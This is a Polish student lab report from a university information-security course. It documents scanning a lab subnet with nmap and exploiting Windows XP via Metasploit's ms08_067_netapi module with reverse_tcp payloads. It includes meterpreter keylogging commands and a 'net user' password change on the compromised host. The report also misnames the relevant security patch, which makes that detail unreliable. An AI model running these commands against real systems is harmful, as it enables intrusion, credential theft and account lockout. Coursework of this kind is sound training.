W
OJSKOWA
A
KADEMIA
T
ECHNICZNA
Podstawy bezpieczeństwa informacji
Sprawozdanie z ćwiczeń laboratoryjnych nr 1.
Prowadzący: mgr inż. Bartosz Kryński
Wykonali:
Jakub Łochocki
Grupa: I9M1S1
Nr albumu: 45303
Mateusz Fruba
Grupa: I9M1S1
Nr albumu: 45261
Treść zadania
1.
Włączyć z płyty wersję LiveCD system Backtrack, następnie za pomocą narzędzia
nmap
przeskanować całą sieć lokalną w poszukiwaniu komputera z innym systemem
operacyjnym niż Backtrack.
2.
Następnie sprawdzić, czy na w/w komputerze jest otwarty port 8080.
3.
Wykorzystać exploit-a w celu przechwyceniu hasła administratora (tzw. Keylogger).
4.
Wykorzystać exploit-a w celu zdalnej i nieautoryzowanej zmiany hasła administratora.
Wykonanie
Opis narzędzi
BackTrack to specjalistyczna dystrybuc
ja Linuksa szczególnie ceniona wśród
specjalistów IT i audytorów zabezpieczeń. Dystrybucja ta stanowi unikatowy zbiór kilkuset
profesjonalnych, bardzo różnorodnych narzędzi do monitorowania i analizy ruchu
sieciowego, zbierania informacji na temat sieci i
znajdujących się w niej urządzeń, a także
kontroli stanu zabezpieczeń sieci i ich łamania oraz przeprowadzania testów penetracyjnych.
BackTrack zawiera wbudowane sterowniki do większości najpopularniejszych sieciowych
kart bezprzewodowych, dzięki czemu można go uruchomić na praktycznie każdym notebooku
i od razu przystąpić do pracy - bez instalacji na komputerze, bez pozostawiania jakichkolwiek
śladów aktywności. Narzędzie nmap służy do skanowania sieci pod kątem otwartych portów
oraz użytkowanych usług. Metasploit jest natomiast narzędziem wykorzystywanym do testów
penetracyjnych i łamania zabezpieczeń systemów teleinformatycznych. Metasploit posiada
bazę gotowych exploitów oraz udostępnia interfejs, dzięki któremu można przygotowywać
własne, korzystając z gotowych komponentów. Exploit jako narzędzie pozwala poprzez
wykorzystanie błędów i luki w oprogramowaniu na uzyskanie dostępu nad daną maszyną.
Natomiast moduł ms08_067 jest w stanie wykorzystać krytyczny błąd w zabezpieczeniach.
Eksploatacja luki poleg
a na wysłaniu do serwera specjalnie spreparowanego zapytania RPC,
co może prowadzić do zdalnego wykonania kodu i w efekcie do przejęcia kontroli nad
atakowanym systemem.
Warunkiem udanego włamania jest brak w systemie poprawki
bezpieczeństwa KB921883.
P
rzebieg ćwiczenia
Ćwiczenie rozpocząłem od uruchomienia płyty z systemem Backtrack. Po
uruchomieniu systemu się systemu rozpocząłem poszukiwania komputera (celu ataku):
•
Wywołanie komendy nmap –A –vv –p 8080 10.3.236.* gdzie:
A – agresywne opcje skanowania,
vv -
podwyższenie poziomu,
p – skanowanie po danych zakresie portów,
• Komputer, cel ataku
posiadał adres IP 10.3.236.107, działał na systemie
operacyjnym Windows XP z SP2 PL.
Następnie uruchomiłem środowisko metasploit za pomocą komendy msfconsole oraz
wy
korzystałem exploit – celem jest hasło użytkownika systemu (rys. 1):
• msf > svn update - aktualizacyjnego
środowiska Metasploit
• msf > use exploit/windows/smb/ms08_067_netapi -
wejście w tryb
konfiguracji modułu exploitu
• msf exploit(ms08_067_netapi) > set RHOST 10.3. 236.107 - ustawienie adresu
IP docelowego
• msf exploit(ms08_067_netapi) > set LHOST 10.3. 236.113 - ustawienie adresu
IP naszego systemu
• msf exploit(ms08_067_netapi) > set PAYLOAD
windows/meterpreter/reverse_tcp -
wybór oraz wejście w tryb konfiguracji
modułu payloadu
• msf exploit(ms08_067_netapi) > exploit - uruchomiemie exploitu
ms08_067_netapi
Rys. 1. Wykorzystanie środowiska metasploit.
Dalej
po uzyskaniu dostępu do exploita, pozyskaliśmy hasło do systemu (rys.2):
• meterpreter > ps – m -
wyświetlenie wszystkich uruchomionych procesów na
atakowanym komputerze
• meterpreter > migrate 660 –
włączenie się do procesu o numerze 660
•
meterpeter > keyscan_start (włączenie nasłuchiwania naciśniętych klawiszy)
•
meterpreter > keyscan_dump (wyświetlenie przechwyconych znaków)
Rys.2.
Pozyskanie hasła
Następnie dokonałem zmiany hasła administratora:
• msf > svn update - uruchomienie procesu aktualizacyjnego Metasploit
• msf > use exploit/windows/smb/ms08_067_netapi -
wejście w tryb
konfiguracji
modułu exploitu ms08_067_netapi
• msf exploit(ms08_067_netapi) > set RHOST 10.3.237.191 - ustawienie adresu
IP docelowego komputera
• msf exploit(ms08_067_netapi) > set LHOST 10.3.237.105 - ustawienie adresu
IP naszego systemu
• msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp -
wejście w tryb konfiguracji modułu payloadu shell /reverse_tcp
• msf exploit(ms08_067_netapi) > exploit - uruchomiemie exploitu
ms08_067_netapi
Wykonane polecenia pozwoliły na uzyskanie dostęp do interpretera poleceń cmd.exe.
Wywołanie polecenia C:\Windows\System32\net user Clico nowehaslo pozwoliło na zmianę
hasła użytkownika Clico.
Wnioski
Backtrack jako dystrybucja Linuxa, oparta o Ubuntu
zawiera narzędzia do testowania i
łamania zabezpieczeń systemów komputerowych. Wykorzystując słabość zabezpieczeń
komputerów możemy uzyskiwać nad nimi kontrolę. To właśnie było celem naszego
ćwiczenia.
Podczas
ćwiczenia uzyskaliśmy dostęp do systemu komputera, który był celem ataku.
Umożliwiło nam to narzędzie Metasploit, które służy do testów penetracyjnych i łamania
zabezpieczeń systemów teleinformatycznych. Metasploit posiada bazę gotowych exploitów
oraz udostępnia interfejs, dzięki któremu można przygotowywać własne, korzystając z
gotowych komponentów.
Dokonaliśmy odczytania i zmiany hasła administratora. Ćwiczenie
zostało przeprowadzone prawidłowo. Zmiana hasła uniemożliwiła dostęp do atakowanego
komputera.